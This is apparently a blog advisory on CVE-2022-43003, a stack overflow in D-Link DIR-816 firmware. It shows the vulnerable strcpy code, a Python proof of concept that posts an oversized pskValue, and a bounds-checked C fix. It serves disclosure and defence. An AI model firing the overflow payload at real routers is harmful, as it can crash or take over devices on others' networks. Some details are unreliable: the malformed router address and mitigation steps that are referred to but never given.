In today's highly connected world, the security of our networking devices has become a major concern. The D-Link DIR-816 router is a widely used device known for its robust security features and efficient performance. However, a critical vulnerability, identified as CVE-2022-43003, has been discovered in the D-Link DIR-816 A2 1.10 B05 firmware, and it can compromise the security of the entire network behind the router.

Vulnerability Details

The CVE-2022-43003 vulnerability in the D-Link DIR-816 A2 1.10 B05 firmware is a stack-based buffer overflow: in the setRepeaterSecurity function, the value of the pskValue parameter is copied into a fixed-size stack buffer without any length check. The issue is triggered when the device receives a malicious HTTP POST request containing an excessively long value for "pskValue". This can lead to arbitrary code execution on the device, granting an attacker unauthorized access not only to the router's settings and credentials but potentially to other network-connected devices as well.

The initial discovery and reporting of the vulnerability can be traced back to these sources:

1. D-Link DIR-816 A2 1.10 B05 Stack Overflow by Ezequiel Fernandez - This article explains the original discovery and a detailed description of the vulnerability.
2. NIST NVD CVE-2022-43003 - NIST's National Vulnerability Database provides additional information about this vulnerability.

Below is a code snippet showing the vulnerable section of the setRepeaterSecurity function:

int setRepeaterSecurity(struct http_request_t *req)
{
  char v1;
  char v2[64];   // selected security type, e.g. "wpa2-personal"
  char s[512];   // destination buffer for pskValue: fixed 512 bytes on the stack

  [...]

  // Vulnerable section
  if (safe_strcmp(v2, "wpa-personal") == 0 || safe_strcmp(v2, "wpa2-personal") == 0 ||
      safe_strcmp(v2, "wpa-auto-personal") == 0)
  {
    // stack overflow occurs here: strcpy copies the attacker-controlled pskValue
    // into s[512] with no bound on its length
    strcpy(s, req_get(req, "pskValue"));
  }

  [...]

  return result;
}

Exploit Details

To exploit this vulnerability, an attacker needs to send a maliciously crafted HTTP POST request to the router's web interface. A sample Python script to exploit the vulnerability can be found in the original exploit article:

import requests

url = 'http://192.168..1'
postData = {
  "nextLink": "wizard.htm",
  "ssid": "ssidname",
  "security_type": "wpa2-personal",
  "psk_cipher_type": "CCMP",
  "pskValue": "A" * 524  # Sending overflow payload
}

requests.post(url, data=postData, auth=("Admin", ""))

The sample script sends an HTTP POST request to the router's IP address (by default, "192.168..1") with a payload containing an excessively long "pskValue" (524 characters, more than the 512-byte stack buffer). This triggers the stack overflow when the vulnerable setRepeaterSecurity function processes the request.
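For comparison with the vulnerable strcpy above and the 524-byte payload just described, here is an added example (not D-Link's code or their fix) of how the pskValue handling should have been written: the input length is checked against the 512-byte destination before anything is copied, and a request that would overflow is rejected instead of processed. The struct http_request_t table and the req_get() helper below are constructed stand-ins for the firmware's request object, so the example runs without the real HTTP server.

```c
#include <stddef.h>
#include <string.h>

/* Constructed stand-in for the firmware's request object: a small
 * key/value table of form fields (assumption, not the real firmware type). */
struct kv { const char *key; const char *val; };
struct http_request_t { const struct kv *params; size_t count; };

/* Assumed lookup helper mirroring the req_get() seen in the decompiled
 * snippet: returns the field's value, or NULL if the field is absent. */
static const char *req_get(const struct http_request_t *req, const char *key)
{
    for (size_t i = 0; i < req->count; i++)
        if (strcmp(req->params[i].key, key) == 0)
            return req->params[i].val;
    return NULL;
}

#define PSK_MAX 64  /* WPA passphrase is 8..63 chars; a raw PSK is 64 hex digits */

/* Hardened replacement for the unbounded strcpy: the length of pskValue is
 * measured without reading past dstlen bytes, then checked against both the
 * destination size and the protocol's PSK limits before a bounded copy.
 * Returns 0 on success, -1 when the field is missing, too short or too long. */
int copy_psk_checked(const struct http_request_t *req, char *dst, size_t dstlen)
{
    const char *psk = req_get(req, "pskValue");
    if (psk == NULL)
        return -1;
    const char *end = memchr(psk, '\0', dstlen);       /* bounded scan for NUL */
    size_t len = end ? (size_t)(end - psk) : dstlen;   /* no NUL within dstlen: too long */
    if (len >= dstlen || len > PSK_MAX || len < 8)
        return -1;                                     /* would overflow or is not a valid PSK */
    memcpy(dst, psk, len);
    dst[len] = '\0';
    return 0;
}

/* Drives the check with a constructed request whose pskValue is n 'A's,
 * copied into the same 512-byte stack buffer the vulnerable function uses. */
int check_psk_of_length(size_t n)
{
    char value[600];
    char s[512];
    if (n >= sizeof value)
        return -1;
    memset(value, 'A', n);
    value[n] = '\0';
    struct kv params[] = { {"security_type", "wpa2-personal"}, {"pskValue", value} };
    struct http_request_t req = { params, 2 };
    return copy_psk_checked(&req, s, sizeof s);
}
```

With this check in place the 524-byte request from the sample script is refused before any copy happens, while a normal 8 to 63 character passphrase is accepted.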

Conclusion

CVE-2022-43003 represents a critical vulnerability in the D-Link DIR-816 A2 1.10 B05 firmware. As we await the release of a patch to address this issue, it is essential for users of this device to remain vigilant and follow the recommended mitigation steps to maintain the security and integrity of their networks.

Timeline

Published on: 10/26/2022 19:15:00 UTC
Last modified on: 10/28/2022 14:46:00 UTC